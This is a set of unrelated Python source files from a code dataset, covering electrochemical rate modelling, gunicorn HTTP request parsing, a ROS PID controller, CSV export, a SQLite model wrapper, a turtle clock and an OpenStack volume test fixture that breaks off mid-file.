vacuum_lvl\n\n # variables that should be defined through set_params function\n self.C_EDL = None\n self.T = None\n self.l = None\n self.sheet_area = None\n\n # variables that will be created during calculations\n self.sigma_Q_arr = None\n\n # variable that define numerical parameters of quantum charge calculation\n self.__SIGMA_0 = 0.5\n self.__SIGMA_ACCURACY = 1e-3\n self.__SIGMA_RANGE = 4\n\n if DOS is None:\n try:\n self.DOS = np.load(path_to_data + '/DOS.npy')\n except OSError:\n print('File DOS.npy does not exist')\n\n if E is None:\n try:\n self.E = np.load(path_to_data + '/E.npy')\n except OSError:\n print('File E_DOS.npy does not exist')\n\n if efermi is None:\n try:\n self.efermi = np.load(path_to_data + '/efermi.npy')\n except OSError:\n print('File efermi.npy does not exist')\n\n if vacuum_lvl is None:\n try:\n self.vacuum_lvl = np.load(path_to_data + '/vacuum_lvl.npy')\n except OSError:\n print('File vacuum_lvl.npy does not exist')\n\n def set_params(self, C_EDL, T, l, sheet_area):\n \"\"\"Sets parameters of calculation\n\n Parameters:\n ----------\n C_EDL: float, str\n float: Capacitance of electric double layer (microF/cm^2)\n str: 'Q' calculating in the Quantum Capacitance Dominating limit (C_Q << C_EDL)\n str: 'Cl' calculating in the Classical limit (C_Q >> C_EDL)\n\n T: int, float\n Temperature. It is used in computing Fermi function and distribution function of redox system states\n\n l: float\n Reorganization energy in eV\n \"\"\"\n self.C_EDL = C_EDL\n self.T = T\n self.l = l\n\n self.sheet_area = sheet_area\n\n def set_params_advance(self, SIGMA_0=0.5, ACCURACY_SIGMA=1e-3, SIGMA_RANGE=4):\n \"\"\"\n Sets numerical parameters that are used in quantum charge density calculations. Delete cashed\n results of charge calculations.\n Args:\n SIGMA_0: float, optional\n Initial guess for charge at equilibrium\n ACCURACY_SIGMA: float, optional\n Accuracy of charge calculation\n SIGMA_RANGE: float, optional\n It defines the minimum and maximum calculated charge\n \"\"\"\n self.__SIGMA_0 = SIGMA_0\n self.__SIGMA_ACCURACY = ACCURACY_SIGMA\n self.__SIGMA_RANGE = SIGMA_RANGE\n self.sigma_Q_arr = None\n\n @staticmethod\n def fermi_func(E, T):\n \"\"\"\n Calculates Fermi-Dirac Distribution\n Args:\n E: Energies\n T: Temperature in K\n \"\"\"\n k = 8.617e-5 # eV/K\n return 1 / (1 + np.exp(E / (k * T)))\n\n @staticmethod\n def W_ox(E, T, l):\n \"\"\"\n Distribution of oxidized states\n Args:\n E (np.array): Energies\n T (float): Temperature\n l (float): Reorganization energy\n \"\"\"\n k = 8.617e-5 # eV/K\n W_0 = (1 / np.sqrt(4 * k * T * l))\n return W_0 * np.exp(- (E - l) ** 2 / (4 * k * T * l))\n\n @staticmethod\n def W_red(E, T, l):\n \"\"\"\n Distribution of reduced states\n Args:\n E (np.array): Energies\n T (float): Temperature\n l (float): Reorganization energy\n \"\"\"\n k = 8.617e-5 # eV/K\n W_0 = (1 / np.sqrt(4 * k * T * l))\n return W_0 * np.exp(- (E + l) ** 2 / (4 * k * T * l))\n\n def compute_C_quantum(self, dE_Q_arr):\n \"\"\"\n Calculates differential quantum capacitance\n Q = e * int{DOS(E) * [f(E) - f(E + deltaE)] dE}\n C_Q = - dQ/d(deltaE) = - (e / (4*k*T)) * int{DOS(E) * sech^2[(E+deltaE)/(2*k*T)] dE}\n Args:\n dE_Q_arr (np.array, float): Energy shift at which C_Q is calculated\n Returns:\n Quantum capacitance in accordance with energy displacement(s)\n TODO check constants\n \"\"\"\n self.check_existence('T')\n self.check_existence('sheet_area')\n\n k = 8.617e-5 # eV/K\n\n elementary_charge = 1.6e-19 # C\n k_1 = 1.38e-23 # J/K\n const = (1e6 * elementary_charge ** 2) / (4 * k_1 * self.sheet_area) # micro F / cm^2\n\n if isinstance(dE_Q_arr, typing.Iterable):\n\n C_q_arr = np.zeros_like(dE_Q_arr)\n\n for i, dE_Q in enumerate(dE_Q_arr):\n E_2 = self.E - dE_Q # energy range for cosh function\n cosh = np.cosh(E_2 / (2 * k * self.T))\n integrand = (self.DOS / cosh) / cosh\n C_q = (const / self.T) * integrate.simps(integrand, self.E)\n C_q_arr[i] = C_q\n\n return C_q_arr\n\n def compute_C_total(self, E_diff_arr, add_info=False):\n\n sigma_arr = np.zeros_like(E_diff_arr)\n for i, E_diff in tqdm(enumerate(E_diff_arr), total=len(E_diff_arr)):\n sigma_arr[i] = self.compute_sigma(E_diff, sigma_0=sigma_arr[i-1])\n\n C_tot_arr = np.zeros_like(E_diff_arr)\n C_Q_arr = np.zeros_like(E_diff_arr)\n\n for i, (E_diff, sigma) in enumerate(zip(E_diff_arr, sigma_arr)):\n ind = nearest_array_index(self.sigma_Q_arr, sigma)\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n dE_Q = E_start + E_step * ind\n C_Q = self.compute_C_quantum([dE_Q])\n C_Q_arr[i] = C_Q[0]\n C_tot = C_Q * self.C_EDL / (C_Q + self.C_EDL)\n C_tot_arr[i] = C_tot\n\n if add_info is False:\n return C_tot_arr\n else:\n return C_tot_arr, C_Q_arr, sigma_arr\n\n def compute_sigma_EDL(self, dE_EDL):\n \"\"\"\n Calculates charge corresponding to the potential drop of -dE_EDL/|e|.\n Takes into account integral capacitance C_EDL\n Args:\n dE_EDL (float, np.array): Electron energy shift due to potential drop\n Returns:\n Charge or Sequence of charges\n \"\"\"\n self.check_existence('C_EDL')\n return - self.C_EDL * dE_EDL\n\n def compute_sigma_quantum(self, dE_Q_arr):\n \"\"\"\n Computes surface charge density induced by depletion or excess of electrons\n\n Parameters:\n ----------\n dE_Q_arr: np.ndarray, float\n Shift in Fermi level due to quantum capacitance\n\n Returns:\n -------\n sigmas: np.ndarray, float\n Computed values (or one value) of surface charge densities\n \"\"\"\n\n self.check_existence('T')\n self.check_existence('sheet_area')\n\n elementary_charge = 1.6e-13 # micro coulomb\n\n if isinstance(dE_Q_arr, typing.Iterable):\n y_fermi = self.fermi_func(self.E, self.T)\n\n sigmas = []\n\n for dE_Q in dE_Q_arr:\n E_2 = self.E - dE_Q # energy range for shifted Fermi_Dirac function\n y_fermi_shifted = self.fermi_func(E_2, self.T)\n integrand = self.DOS * (y_fermi - y_fermi_shifted)\n sigma = (elementary_charge / self.sheet_area) * integrate.simps(integrand, self.E)\n sigmas.append(sigma)\n\n return sigmas\n\n elif isinstance(dE_Q_arr, numbers.Real):\n y_fermi = self.fermi_func(self.E, self.T)\n\n E_2 = self.E - dE_Q_arr # energy range for shifted Fermi_Dirac function\n y_fermi_shifted = self.fermi_func(E_2, self.T)\n integrand = self.DOS * (y_fermi - y_fermi_shifted)\n sigma = (elementary_charge / self.sheet_area) * integrate.simps(integrand, self.E)\n\n return sigma\n else:\n raise TypeError(f'Invalid type of dE_Q_arr: {type(dE_Q_arr)}')\n\n def compute_sigma(self, E_diff, sigma_0=None):\n\n def error_E_diff(sigma, E_diff, sigma_Q_arr):\n ind = nearest_array_index(sigma_Q_arr, sigma)\n dE_Q = E_start + E_step * ind\n dE_EDL = - sigma / self.C_EDL\n dE_total = dE_Q + dE_EDL\n\n return (dE_total - E_diff) ** 2\n\n for var in ['T', 'l', 'C_EDL']:\n self.check_existence(var)\n\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n if sigma_0 is None:\n sigma_0 = self.__SIGMA_0\n # check if we've already calculated sigma_Q_arr in another run\n if self.sigma_Q_arr is None:\n E_range = np.arange(E_start, -E_start, E_step)\n sigma_Q_arr = self.compute_sigma_quantum(E_range)\n self.sigma_Q_arr = sigma_Q_arr\n else:\n sigma_Q_arr = self.sigma_Q_arr\n\n result = minimize(error_E_diff, np.array([sigma_0]), args=(E_diff, sigma_Q_arr))\n sigma = result.x[0]\n\n return sigma\n\n def compute_distributions(self, V_std, overpot=0, reverse=False, add_info=False):\n \"\"\"Computes Fermi-Dirac and Redox species distributions according to Gerischer-Markus formalism\n with Quantum Capacitance\n\n Parameters:\n ----------\n V_std: float\n Standard potential (vs SHE) of a redox couple (Volts)\n overpot: float, optional\n Overpotential (Volts). It shifts the electrode Fermi energy to -|e|*overpot\n reverse: bool, optional\n If reverse is False the process of electron transfer from electrode to the oxidized state of the\n redox species is considered and vice versa\n add_info: bool, optional\n If False the func returns Fermi-Dirac and Redox species distributions\n If True additionally returns dE_Q (Fermi energy shift due to the quantum capacitance),\n sigma (surface charge) and E_diff (the whole energy shift with respect to the original Fermi level)\n\n Returns:\n -------\n y_fermi: np.array\n Fermi-Dirac distribution\n y_redox: np.array\n Redox species distributions\n dE_Q: np.array, optional (if add_info == True)\n Total shift of the Fermi energy due to the Quantum Capacitance\n sigma: np.array, optional (if add_info == True)\n surface charge in microF/cm^2\n E_F_redox: np.array, optional (if add_info == True)\n The sum of two energy displacement of the electrode due to the difference in Fermi level of Redox couple\n and the electrode and overpotential. It splits into dE_Q and dE_EDL\n \"\"\"\n\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std + self.vacuum_lvl - overpot\n sigma = self.compute_sigma(E_F_redox)\n\n ind = nearest_array_index(self.sigma_Q_arr, sigma)\n E_step = self.__SIGMA_ACCURACY\n E_start = - self.__SIGMA_RANGE\n dE_Q = E_start + E_step * ind\n\n E_fermi = self.E - dE_Q\n E_DOS_redox = self.E - dE_Q - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n if not add_info:\n return y_fermi, y_redox\n else:\n return y_fermi, y_redox, dE_Q, sigma, E_F_redox\n\n def compute_k_HET(self, V_std_pot_arr, overpot_arr, reverse=False, add_info=False):\n \"\"\"Computes integral k_HET using Gerischer-Markus formalism with quantum capacitance\n\n Parameters:\n ----------\n V_std_pot_arr: float, np.ndarray\n A range of varying a standard potential\n overpot_arr: float, np.ndarray\n A range of varying an overpotential\n reverse: bool, optional\n if reverse is False the process of electron transfer from electrode to the oxidized state of the\n redox mediator is considered and vice versa\n\n Returns:\n -------\n k_HET: np.array\n Calculated heterogeneous electron transfer rate constant according to Gerischer-Marcus model with quantum\n capacitance\n dE_Q_arr: np.ndarray, optional (if add_info == True)\n Total shift of the Fermi energy due to the Quantum Capacitance for all calculated redox potentials or\n overpotentials\n sigma_arr: np.ndarray, optional (if add_info == True)\n surface charge in microF/cm^2 for all calculated redox potentials or overpotentials\n E_F_redox_arr: np.ndarray, optional (if add_info == True)\n The sum of two energy displacement of the electrode due to the difference in Fermi level of Redox couple\n and the electrode and overpotential. It splits into dE_Q and dE_EDL. For all calculated redox potentials\n or overpotentials\n y_fermi_arr: 2D np.ndarray, optional (if add_info == True)\n Fermi-Dirac distribution for all calculated redox potentials or overpotentials\n y_redox_arr: 2D np.ndarray, optional (if add_info == True)\n Redox species distributions for all calculated redox potentials or overpotentials\n \"\"\"\n\n if isinstance(self.C_EDL, numbers.Real):\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n k_HET = np.zeros_like(V_std_pot_arr)\n if not add_info:\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n y_fermi, y_redox = self.compute_distributions(V_std, reverse=reverse, overpot=overpot_arr)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n return k_HET\n else:\n dE_Q_arr = np.zeros_like(V_std_pot_arr)\n sigma_arr = np.zeros_like(V_std_pot_arr)\n E_F_redox_arr = np.zeros_like(V_std_pot_arr)\n y_fermi_arr = np.zeros((len(V_std_pot_arr), len(self.E)))\n y_redox_arr = np.zeros((len(V_std_pot_arr), len(self.E)))\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n y_fermi, y_redox, dE_Q, sigma, E_F_redox = self.compute_distributions(V_std, reverse=reverse,\n overpot=overpot_arr,\n add_info=add_info)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n dE_Q_arr[i] = dE_Q\n sigma_arr[i] = sigma\n E_F_redox_arr[i] = E_F_redox\n y_fermi_arr[i] = y_fermi\n y_redox_arr[i] = y_redox\n return k_HET, dE_Q_arr, sigma_arr, E_F_redox_arr, y_fermi_arr, y_redox_arr\n\n elif isinstance(overpot_arr, typing.Iterable) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n if not add_info:\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n y_fermi, y_redox = self.compute_distributions(V_std_pot_arr, reverse=reverse, overpot=overpot)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n\n return k_HET\n else:\n dE_Q_arr = np.zeros_like(overpot_arr)\n sigma_arr = np.zeros_like(overpot_arr)\n E_F_redox_arr = np.zeros_like(overpot_arr)\n y_fermi_arr = np.zeros((len(overpot_arr), len(self.E)))\n y_redox_arr = np.zeros((len(overpot_arr), len(self.E)))\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n y_fermi, y_redox, dE_Q, sigma, E_F_redox = self.compute_distributions(V_std_pot_arr,\n reverse=reverse,\n overpot=overpot,\n add_info=add_info)\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E) / self.sheet_area\n dE_Q_arr[i] = dE_Q\n sigma_arr[i] = sigma\n E_F_redox_arr[i] = E_F_redox\n y_fermi_arr[i] = y_fermi\n y_redox_arr[i] = y_redox\n return k_HET, dE_Q_arr, sigma_arr, E_F_redox_arr, y_fermi_arr, y_redox_arr\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. The other \\\n must be a Real number')\n\n elif self.C_EDL == 'Cl':\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n E_fermi = self.E\n E_DOS_redox = self.E - overpot_arr\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET = np.ones_like(V_std_pot_arr) * integrate.simps(integrand, self.E)\n\n return k_HET\n\n elif isinstance(overpot_arr, typing.Sequence) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n E_fermi = self.E\n E_DOS_redox = self.E - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. The other \\\n must be Real number')\n\n elif self.C_EDL == 'Q':\n if isinstance(V_std_pot_arr, typing.Iterable) and isinstance(overpot_arr, numbers.Real):\n k_HET = np.zeros_like(V_std_pot_arr)\n\n for i, V_std in tqdm(enumerate(V_std_pot_arr), total=len(V_std_pot_arr)):\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std + self.vacuum_lvl\n E_DOS_redox = self.E - E_F_redox\n E_fermi = E_DOS_redox - overpot_arr\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n elif isinstance(overpot_arr, typing.Iterable) and isinstance(V_std_pot_arr, numbers.Real):\n k_HET = np.zeros_like(overpot_arr)\n\n for i, overpot in tqdm(enumerate(overpot_arr), total=len(overpot_arr)):\n E_F_redox = E_F_SHE_VAC - self.efermi - V_std_pot_arr + self.vacuum_lvl - overpot\n E_fermi = self.E - E_F_redox\n E_DOS_redox = self.E - E_F_redox - overpot\n\n if reverse:\n y_fermi = 1 - self.fermi_func(E_fermi, self.T)\n y_redox = self.W_red(E_DOS_redox, self.T, self.l)\n else:\n y_fermi = self.fermi_func(E_fermi, self.T)\n y_redox = self.W_ox(E_DOS_redox, self.T, self.l)\n\n integrand = self.DOS * y_fermi * y_redox\n k_HET[i] = integrate.simps(integrand, self.E)\n\n return k_HET\n\n else:\n raise ValueError('One and only one type of V_std_pot_arr and overpot arr must be Sequence. The other \\\n must be Real number')\n","sub_path":"echem/eltransfer/GerischerMarkus.py","file_name":"GerischerMarkus.py","file_ext":"py","file_size_in_byte":22332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"428428631","text":"# -*- coding: utf-8 -\n#\n# This file is part of gunicorn released under the MIT license. \n# See the NOTICE for more information.\n\nimport re\nimport urlparse\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom gunicorn.http.body import ChunkedReader, LengthReader, EOFReader, Body\nfrom gunicorn.http.errors import InvalidHeader, InvalidHeaderName, NoMoreData, \\\nInvalidRequestLine, InvalidRequestMethod, InvalidHTTPVersion\n\nclass Message(object):\n def __init__(self, unreader):\n self.unreader = unreader\n self.version = None\n self.headers = []\n self.trailers = []\n self.body = None\n\n self.hdrre = re.compile(\"[\\x00-\\x1F\\x7F()<>@,;:\\[\\]={} \\t\\\\\\\\\\\"]\")\n\n unused = self.parse(self.unreader)\n self.unreader.unread(unused)\n self.set_body_reader()\n \n def parse(self):\n raise NotImplementedError()\n\n def parse_headers(self, data):\n headers = []\n\n # Split lines on \\r\\n keeping the \\r\\n on each line\n lines = [line + \"\\r\\n\" for line in data.split(\"\\r\\n\")]\n\n # Parse headers into key/value pairs paying attention\n # to continuation lines.\n while len(lines):\n # Parse initial header name : value pair.\n curr = lines.pop(0)\n if curr.find(\":\") < 0:\n raise InvalidHeader(curr.strip())\n name, value = curr.split(\":\", 1)\n name = name.rstrip(\" \\t\").upper()\n if self.hdrre.search(name):\n raise InvalidHeaderName(name)\n name, value = name.strip(), [value.lstrip()]\n \n # Consume value continuation lines\n while len(lines) and lines[0].startswith((\" \", \"\\t\")):\n value.append(lines.pop(0))\n value = ''.join(value).rstrip()\n \n headers.append((name, value))\n return headers\n\n def set_body_reader(self):\n chunked = False\n response_length = None\n for (name, value) in self.headers:\n if name == \"CONTENT-LENGTH\":\n try:\n response_length = int(value)\n except ValueError:\n response_length = None\n elif name == \"TRANSFER-ENCODING\":\n chunked = value.lower() == \"chunked\"\n elif name == \"SEC-WEBSOCKET-KEY1\":\n response_length = 8\n\n if response_length is not None or chunked:\n break\n\n if chunked:\n self.body = Body(ChunkedReader(self, self.unreader))\n elif response_length is not None:\n self.body = Body(LengthReader(self.unreader, response_length))\n else:\n self.body = Body(EOFReader(self.unreader))\n\n def should_close(self):\n for (h, v) in self.headers:\n if h == \"CONNECTION\":\n v = v.lower().strip()\n if v == \"close\":\n return True\n elif v == \"keep-alive\":\n return False\n break\n return self.version <= (1, 0)\n\n\nclass Request(Message):\n def __init__(self, unreader):\n self.methre = re.compile(\"[A-Z0-9$-_.]{3,20}\")\n self.versre = re.compile(\"HTTP/(\\d+).(\\d+)\")\n \n self.method = None\n self.uri = None\n self.scheme = None\n self.host = None\n self.port = 80\n self.path = None\n self.query = None\n self.fragment = None\n\n super(Request, self).__init__(unreader)\n\n\n def get_data(self, unreader, buf, stop=False):\n data = unreader.read()\n if not data:\n if stop:\n raise StopIteration()\n raise NoMoreData(buf.getvalue())\n buf.write(data)\n \n def parse(self, unreader):\n buf = StringIO()\n\n self.get_data(unreader, buf, stop=True)\n \n # Request line\n idx = buf.getvalue().find(\"\\r\\n\")\n while idx < 0:\n self.get_data(unreader, buf)\n idx = buf.getvalue().find(\"\\r\\n\")\n self.parse_request_line(buf.getvalue()[:idx])\n rest = buf.getvalue()[idx+2:] # Skip \\r\\n\n buf = StringIO()\n buf.write(rest)\n \n \n # Headers\n idx = buf.getvalue().find(\"\\r\\n\\r\\n\")\n\n done = buf.getvalue()[:2] == \"\\r\\n\"\n while idx < 0 and not done:\n self.get_data(unreader, buf)\n idx = buf.getvalue().find(\"\\r\\n\\r\\n\")\n done = buf.getvalue()[:2] == \"\\r\\n\"\n \n if done:\n self.unreader.unread(buf.getvalue()[2:])\n return \"\"\n\n self.headers = self.parse_headers(buf.getvalue()[:idx])\n\n ret = buf.getvalue()[idx+4:]\n buf = StringIO()\n return ret\n \n def parse_request_line(self, line):\n bits = line.split(None, 2)\n if len(bits) != 3:\n raise InvalidRequestLine(line)\n\n # Method\n if not self.methre.match(bits[0]):\n raise InvalidRequestMethod(bits[0])\n self.method = bits[0].upper()\n\n # URI\n self.uri = bits[1]\n parts = urlparse.urlsplit(bits[1])\n self.scheme = parts.scheme or ''\n self.host = parts.netloc or None\n if parts.port is None:\n self.port = 80\n else:\n self.host = self.host.rsplit(\":\", 1)[0]\n self.port = parts.port\n self.path = parts.path or \"\"\n self.query = parts.query or \"\"\n self.fragment = parts.fragment or \"\"\n\n # Version\n match = self.versre.match(bits[2])\n if match is None:\n raise InvalidHTTPVersion(bits[2])\n self.version = (int(match.group(1)), int(match.group(2)))\n\n def set_body_reader(self):\n super(Request, self).set_body_reader()\n if isinstance(self.body.reader, EOFReader):\n self.body = Body(LengthReader(self.unreader, 0))\n\n\n","sub_path":"gunicorn/http/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"602214259","text":"#!/usr/bin/env python\n\nimport rospy\nfrom control.msg import drive_param\nfrom control.msg import pid_input\nfrom std_msgs.msg import Bool\n\nclass Pid(object):\n\tdef __init__(self):\n\t\t# Params\n\t\tself.kp = 2\n\t\tself.kd = 0.1\n\t\tself.prev_error = 0.0\n\t\tself.go = True\n\n\t\t# Publisher\n\t\tself.pub = rospy.Publisher('control/drive_parameters', drive_param, queue_size=1)\n\n\t\t# Subscribers\n\t\trospy.Subscriber('control/error', pid_input, self.control)\n\t\trospy.Subscriber('control/go', Bool, self.go_callback)\n\n\t\trospy.loginfo(\"Started pid_controller\\nListening to /control/error and /control/go\")\n\t\trospy.spin()\n\n\tdef control(self, data):\n\t\t## Your code goes here\n\t\t# 1. Scale the error\n\t\t# 2. Apply the PID equation on error\n\t\t# 3. Make sure the error is within bounds\n\n\n\n\n\n\t\tmsg = drive_param()\n\t\tmsg.velocity = data.pid_vel\n\t\terror = data.pid_error\n\t\tangle_p = error * self.kp\n\t\tangle_d = self.kd * (error-self.prev_error)\n\t\tangle = angle_p+angle_d\n\t\tself.prev_error = error\n\t\tmsg.angle = angle\n\t\tif not self.go:\n\t\t\tmsg.velocity = 0.0\n\t\tself.pub.publish(msg)\n\t\trospy.loginfo(\"\\nvel: %.0lf\\ngo: %i\", msg.velocity, self.go)\n\n\tdef go_callback(self, msg):\n\t\tself.go = msg.data\n\t\trospy.loginfo(\"\\nEntered go_callback\\ngo: %i\", self.go)\n\nif __name__ == '__main__':\n\trospy.init_node('pid_controller', anonymous=True)\n\tmy_node = Pid()\n","sub_path":"src/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"268492014","text":"'''\r\nCreated on Sep 24, 2019\r\n\r\n@author: jou\r\n'''\r\n\r\nimport csv\r\nimport os\r\nimport datetime\r\nfrom xml.dom import minidom\r\n\r\ndef get_variables(mydoc_xml):\r\n print(\"extracting variables ...\")\r\n\r\n # create CSV-file---------------------------------------------------------------------------------------------------\r\n dirpath = os.getcwd()\r\n\r\n if not os.path.exists(dirpath + '/results/'):\r\n os.mkdir(dirpath + \"/results\")\r\n\r\n if os.path.isfile(dirpath + \"/results/variables_genesys.csv\"):\r\n extract_time = str(datetime.datetime.now())\r\n extract_time = extract_time.replace(':', '-')\r\n save_path = dirpath + '/results/variables_genesys_' + extract_time[2:19] + '.csv'\r\n else:\r\n save_path = dirpath + '/results/variables_genesys.csv'\r\n\r\n # Benoetigte Daten aus Genesys extrahieren--------------------------------------------------------------------------\r\n mydoc = mydoc_xml\r\n converters = mydoc.getElementsByTagName('converter')\r\n storages = mydoc.getElementsByTagName('storage')\r\n lines = mydoc.getElementsByTagName('tr-converter')\r\n\r\n number_of_converters = len(converters)\r\n number_of_storage = len(storages)\r\n number_of_lines = len(lines)\r\n number_of_variables = sum([number_of_converters,number_of_storage,number_of_lines])\r\n\r\n # Daten in das CSV-File schreiben-----------------------------------------------------------------------------------\r\n with open(save_path, 'w', newline='') as csvfile:\r\n filewriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)\r\n filewriter.writerow(['Number of variables,\"#\",'+str(number_of_variables)])","sub_path":"conversion_skripts/ConvertInputGenesys/lib/result_variables.py","file_name":"result_variables.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412219649","text":"import time\r\nimport datetime as dt \r\nimport turtle \r\n\r\nt = turtle.Turtle()\r\nt1 = turtle.Turtle()\r\n\r\ns = turtle.Screen()\r\ns.bgcolor(\"white\")\r\n\r\nsec = dt.datetime.now().second\r\nmin = dt.datetime.now().minute\r\nhr = dt.datetime.now().hour\r\n\r\nt1.pensize(5)\r\nt1.color('purple')\r\n\r\nt1.goto(-20,0)\r\nt1.pendown()\r\n\r\nfor i in range(2):\r\n t1.forward(200)\r\n t1.left(90)\r\n t1.forward(70)\r\n t1.left(90)\r\n\r\nt1.hideturtle()\r\nwhile True:\r\n t.hideturtle()\r\n t.clear()\r\n\r\n t.write(str(hr).zfill(2)+\":\"+str(min).zfill(2)+\":\"+str(sec).zfill(2),font=(\"Arial Narrow\", 35, \"bold\"))\r\n\r\ntime.sleep(1)\r\nsec+=1\r\n\r\nif sec == 60:\r\n sec=0\r\n min+=1\r\n\r\nif min == 60:\r\n min=0\r\n hr+=1\r\n\r\nif hr == 13:\r\n hr=1","sub_path":"Digital_Clock.py","file_name":"Digital_Clock.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"450746348","text":"import sqlite3\nfrom nanoAPI.utils import err, msg\nfrom .model import Model\n\n\nclass DB:\n def __init__(self):\n self.server = sqlite3.connect('database.db')\n self.admin = self.server.cursor()\n self.models = []\n\n def set_models(self, *args):\n self.models.extend(args)\n for model in self.models:\n model.table_name = model.__name__.lower()\n\n def is_booted(self):\n is_booted = False\n for model in self.models:\n self.admin.execute(\n f\"SELECT count(name) FROM sqlite_master WHERE type='table' AND name='{model.__name__.lower()}'\")\n if self.admin.fetchone()[0]:\n is_booted = True\n return is_booted\n\n def boot(self):\n fields = \"id INTEGER PRIMARY KEY AUTOINCREMENT\"\n for model in self.models:\n print(\"\\n\", msg(\"BOOT\", f\"Model {model.__name__}\"))\n if issubclass(model, Model):\n for field in model.get_fields():\n fields = fields + \", \" + field.command\n print(f\"\\t - {field.name}\")\n try:\n self.admin.execute(\n f\"CREATE TABLE IF NOT EXISTS {model.table_name} ({fields})\")\n except sqlite3.OperationalError as sql_err:\n print(\n err(model.__name__, f\"{str(sql_err)}\"))\n fields = \"id INTEGER PRIMARY KEY AUTOINCREMENT\"\n else:\n print(\n err(model.__name__, f\"Models must be an instance of *nanoAPI.db.model.Model*\"))\n self.server.commit()\n\n def __del__(self):\n self.admin.close()\n self.server.close()\n","sub_path":"nanoAPI/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187424883","text":"\"\"\"\nCopyright 2016 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport time\nimport logging\n\nfrom cafe.drivers.unittest.decorators import tags\n\nfrom cloudcafe.blockstorage.volumes_api.common.models import statuses as \\\n volume_statuses\nfrom cloudcafe.common.tools.datagen import rand_name\nfrom cloudcafe.compute.common.types import NovaServerStatusTypes\nfrom cloudcafe.compute.composites import ComputeAdminComposite\n\nfrom cloudroast.compute.fixtures import ServerFromVolumeV2Fixture\n\n\nclass ServerFromVolumeWithAttachmentsMigrateTests(ServerFromVolumeV2Fixture):\n\n @classmethod\n def setUpClass(cls):\n \"\"\" Create and migrate a server from volume with multiple attachments\n\n The following resources are created during this setup:\n - Create an active server.\n \"\"\"\n super(ServerFromVolumeWithAttachmentsMigrateTests, cls).setUpClass()\n\n cls.create_server()\n\n # The base class create_server method adds the server resource to the\n # resources pool by default which will provide attempt to delete the\n # server during class tear down. This resource pool check will attempt\n # to confirm that the server is deleted prior to the resource pool\n # attempting deleting the other resources created below.\n cls.resources.add(cls.server.id, cls.confirm_server_deleted)\n\n num_volumes_to_attach = 2\n cls.attached_volumes = list()\n\n for i in range(num_volumes_to_attach):\n # 